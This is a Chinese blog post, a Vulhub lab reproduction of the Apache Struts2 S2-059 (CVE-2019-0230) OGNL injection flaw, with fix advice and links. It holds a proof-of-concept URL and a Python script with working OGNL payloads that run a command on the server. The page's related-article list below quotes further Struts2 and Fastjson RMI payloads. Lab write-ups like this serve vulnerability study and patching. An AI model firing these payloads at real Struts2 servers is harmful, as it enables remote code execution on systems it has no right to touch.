rmi远程代码执行漏洞_Apache Struts2059远程代码执行漏洞复现

最新推荐文章于 2021-03-28 11:50:04 发布
最新推荐文章于 2021-03-28 11:50:04 发布
阅读量82 收藏
点赞数
文章标签: rmi远程代码执行漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36346221/article/details/112369633
版权

网安引领时代,弥天点亮未来   

ea1dbffc7377b21e08ec008a86185cb9.png 0x00漏洞简述   2020年08月13日,Apache官方发布了Struts2远程代码执行漏洞的风险通告,该漏洞编号为CVE-2019-0230,漏洞等级:高危,漏洞评分:8.5。 漏洞产生的主要原因是因为Apache Struts框架在强制执行时,会对分配给某些标签属性(如id)的属性值执行二次ognl解析。攻击者可以通过构造恶意的OGNL表达式,并将其设置到可被外部输入进行修改,且会执行OGNL表达式的Struts2标签的属性值,引发OGNL表达式解析,最终造成远程代码执行的影响。 ea1dbffc7377b21e08ec008a86185cb9.png 0x01影响版本 Apache Struts2:2.0.0-2.5.20 ea1dbffc7377b21e08ec008a86185cb9.png 0x02漏洞复现

虚拟机部署docker安装Vulhub一键搭建漏洞测试靶场环境。

docker-compose up -d

1、访问漏洞环境

    d3d2365d9b71dcf47d90e9bdb3a76cc3.png               

2、POC验证,传入ognl表达式的poc: %{yun*zui} 这里需要URL编码

4180a88dbf7a633e05033d0ac4697016.png

http://192.168.60.131:8080/?id=%25%7Byun*zui%7D

从测试结果可以看到id属性返回了yun*zui的结果,漏洞存在!

2af76fcbafa67c642dfa05fdb2ade4cc.png

6b84d880f9bbb830e00566e932890e19.png

3、简单python脚本进行漏洞利用

import requestsurl ="http://192.168.60.131:8080"data1 = {    "id":"%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"}data2 = {   "id":"%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('touch/tmp/yunzui'))}"}res1 =requests.post(url, data=data1)# print(res1.text)res2 = requests.post(url,data=data2)# print(res2.text)

运行完脚本之后,将远程执行

touch/tmp/yunzui

cc95f290d96c3b7ddbde40b86e5d55a7.png

4、命令执行结果进入docker查看,成功执行

docker-compose exec struts2 bashls -al /tmp

db7d19109fa48e8a1cc1b85b630fb873.png

ea1dbffc7377b21e08ec008a86185cb9.png 0x03修复建议

升级到Struts2.5.22或更高版本

或者开启ONGL表达式注入保护措施

ea1dbffc7377b21e08ec008a86185cb9.png 0x04参考链接

https://cert.360.cn/warning/detail?id=d2b39f48fd31f3b36cc957f23d4777af

https://cwiki.apache.org/confluence/display/WW/S2-059

https://codeload.github.com/vulhub/vulhub/zip/master

137adda135bd10512a1f3be4b14b738d.gif 

知识分享完了

喜欢别忘了关注我们哦~

予以风动,必降弥天之润!

   弥  天

安全实验室

1bcdaf26e69759238262fb95c4e8363a.png
王诗洋
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[ vulhub漏洞篇 ] struts2远程代码执行漏洞S2-007(CVE-2012-0838)
qq_51577576的博客
10-13 1412
[ vulhub漏洞篇 ] struts2远程代码执行漏洞S2-007(CVE-2012-0838) S2-007和S2-003、S2-005的漏洞源头都是一样的,都是struts2对OGNL的解析过程中存在漏洞 当用户提交 age 为字符串而非整形数值时,后端用代码拼接 "'" + value + "'" 然后对其进行 OGNL 表达式解析。要成功利用,只需要找到一个配置了类似验证规则的表单字段使之转换出错,借助类似 SQLi 注入单引号拼接的方式即可注入任意 OGNL 表达式
rmi远程代码执行漏洞_fastjson远程代码执行漏洞
weixin_39849153的博客
12-22 358
漏洞原理fastjson提供了autotype功能,在请求过程中,我们可以在请求包中通过修改@type的值,来反序列化为指定的类型,而fastjson在反序列化过程中会设置和获取类中的属性,如果类中存在恶意方法,就会导致代码执行漏洞产生。漏洞利用漏洞利用需要我们在vps上启一个RMI服务并调用class文件(class文件为我们的恶意文件)大概过程就是生成恶意class文件py开启web服务然后开...
rmi远程代码执行漏洞_Fastjson <=1.2.62 远程代码执行-漏洞
weixin_39929723的博客
12-22 308
影响范围:Fastjson<=1.2.62需要开启autotypepoc:String text1 = "{\"@type\":\"org.apache.xbean.propertyeditor.JndiConverter\",\"AsText\":\"rmi://127.0.0.1:1099/exploit\"}";pom:com.alibabafastjson1.2.62commons-...
struts2漏洞_Struts2 S2059远程代码执行漏洞(CVE20190230)
weixin_39989443的博客
12-10 249
作为一家专业的网络安全服务供应商,圣博润特别注重对最新安全漏洞的发和追踪,以“及时性、准确性、层次性”为宗旨,为用户提供漏洞预警、通告及响应服务。一、Struts2简介Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下...
Struts2 S2-016,S2-017远程代码执行漏洞解决,修
yx9o
03-26 1万+
Struts2 S2-016,S2-017远程代码执行漏洞解决,修 官网描述如下: http://struts.apache.org/release/2.3.x/docs/s2-016.html 怎么解决呢?
0x29. Apache Struts2远程代码执行漏洞(S2-037)
qq_31679787的博客
10-22 587
s2-037:使用REST插件启用动态方法调用时,可以传递可用于在服务器端执行任意代码的恶意表达式;使用http://localhost:8080/1/XXX这种请求方式,XXX可以是任何合法的名字 ,通过将XXX构造为OGNL执行命令; poc: #_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#process=@java.lan...
Apache Log4j2 远程代码执行漏洞检测工具
12-15
针对这个漏洞,开发出了专门的Apache Log4j2远程代码执行漏洞检测工具,这些工具包括针对Windows和Linux操作系统的版本。这些工具的主要目的是帮助管理员和安全专家迅速识别其环境中是否存在易受攻击的Log4j2实例。 ...
log4j远程执行漏洞,测试源码
12-22
标题提及的是“log4j远程执行漏洞”,这指的是Log4j 2框架中的一个严重安全漏洞,通常称为CVE-2021-44228,也被广泛称为“Log4Shell”漏洞。这个漏洞允许攻击者通过在日志记录语句中注入恶意代码来实远程代码执行...
rmi.zip_Java RMI_java rmi网络_java源代码 RMI
09-22
- **客户端代码**:客户端代码会查找注册表中的远程对象并调用其方法,执行相应的操作。 - **配置文件**:可能包含RMI相关的配置,比如RMIServer的端口号或者注册表的位置等。 学习和理解Java RMI,你需要掌握如何...
Log4J2远程代码执行漏洞20211210.rar
12-13
《Log4J2远程代码执行漏洞详解》 在IT安全领域,Log4J2的远程代码执行漏洞(CVE-2021-44228)引起了广泛关注。此漏洞影响了全球无数使用Java日志框架Log4J2的应用程序,其严重性在于它允许攻击者通过注入特定的...
Struts2远程代码执行漏洞S2-045利用及修
u014416842的博客
04-13 4172
升级到struts-2.3.32, 发无法调用getter方法public class Action { private Map yTypeList = new LinkedHashMap(); // getYtypeList public Map getYTypeList() { yTypeList.put("a", "invalid yTypeList a");
rmi远程代码执行漏洞_Apache Struts2052远程代码执行漏洞
weixin_39626089的博客
12-28 97
网安引领时代,弥天点亮未来0x00漏洞简述2017年9月5日,Apache Struts发布最新的安全公告,Apache Struts 2.5.x的REST插件存在远程代码执行的高危漏洞漏洞编号为CVE-2017-9805(S2-052)。漏洞的成因是由于使用XStreamHandler反序列化XStream实例的时候没有任何类型过滤导致远程代码执行。0x01影响版本Apache...
rmi远程代码执行漏洞_Java RMI远程反序列化任意类及远程代码执行解析(CVE-2017-3241 )...
weixin_30914893的博客
12-31 814
*本文中涉及到的相关漏洞已报送厂商并得到修,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。*本文原创作者:jfeiyi,本文属FreeBuf原创奖励计划,未经许可禁止转载本打算慢慢写出来的,但前几天发国外有研究员发了一篇关于这个CVE的文章,他和我找到的地方很相似。然而不知道是不是Oracle认为是同一个漏洞然后合并了CVE,还是说我找错了CVE。总之,先简单描述一下漏...
C#笔记14 方法01
Tervor_HAN的博客
09-17 541
C#笔记14 方法01 ——本系列是基于人民邮电出版社《C#2008 C#图解教程》、清华大学出版社《C#入门经典(第五版)》两本书的自学C#笔记,如果您发了本文的纰漏,还望不吝指正。 写在前边 在 C#笔记10 类:基础 中,我们已经知道,方法是类中重要的一个函数成员 除了类中,方法也可以声明在结构体,接口中 *习:方法是具有名称的可执行代码块,当方法被调用时,它执行自己所含的代码,然后返回到调用它的代码。有些方法返回一个值到它们被调用的位置。 1. 方法的结构 在类的相关笔记中,我们已经知道了如何声
常见漏洞解析
weixin_33906657的博客
04-12 116
目录 1. CSS(Cross Site Scripting,又名XSS,即跨站脚本攻击) 1. 定义 1. Reflected XSS(基于反射的XSS攻击) 2. Stored XSS(基于存储的XSS攻击) 3. DOM-based or local XSS(基于DOM或本地...
struts2 s2-059漏洞
黑白的博客
11-01 3769
声明 好好学习,天天向上 漏洞描述 struts2框架 2020年8月13日,Apache官方发布了一则公告,该公告称Apache Struts2使用某些标签时,会对标签属性值进行二次表达式解析,当标签属性值使用了%{skillName}并且skillName的值用户可以控制,就会造成OGNL表达式执行。 影响范围 Struts 2.0.0 – Struts 2.5.20 过程 可以下载中间件系列,使用docker搭建 https://github.com/vulhub/vulhub 下载完成后,我这
【S2-045】 Struts2远程命令执行漏洞(CVE-2017-5638)
热门推荐
Jaychouzzk
11-05 2万+
实验环境 操作机:Windows XP 目标机:Centos 6.5 Struts版本:2.3.31 请访问http://file.ichunqiu.com/74tk6wy6下载实验文件 实验目的: 了解S2-045 Struts2远程命令执行漏洞危害 掌握检测修S2-045 Struts2远程命令执行漏洞技术 实验文件: ...
CVE-2021-26295 Apache OFBiz rmi反序列化 漏洞检测脚本
weixin_39811856的博客
03-28 1128
漏洞描述: Apache OFBiz是一个电子商务平台,用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。2021年3月22日 Apache OFBiz官方发布安全更新,修了一处由RMI反序列化造成的远程代码执行漏洞(CVE-2021-26295)。攻击者可构造恶意请求,触发反序列化,从而造成任意代码执行,控制服务器。 JMI解读: Java RMI服务是远程方法调用(Remote Method Invocation)。它是一种机制,能够让在某个java虚拟机..
rmi远程反序列化rce漏洞_Spring框架的反序列化远程代码执行漏洞分析(转)
最新发布
06-06
RMI远程反序列化RCE漏洞是指,攻击者可以通过构造恶意的序列化数据,使得服务端在反序列化时执行恶意代码,从而导致远程代码执行漏洞。这个漏洞的根本原因在于Java序列化机制的设计缺陷,攻击者可以通过构造恶意的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值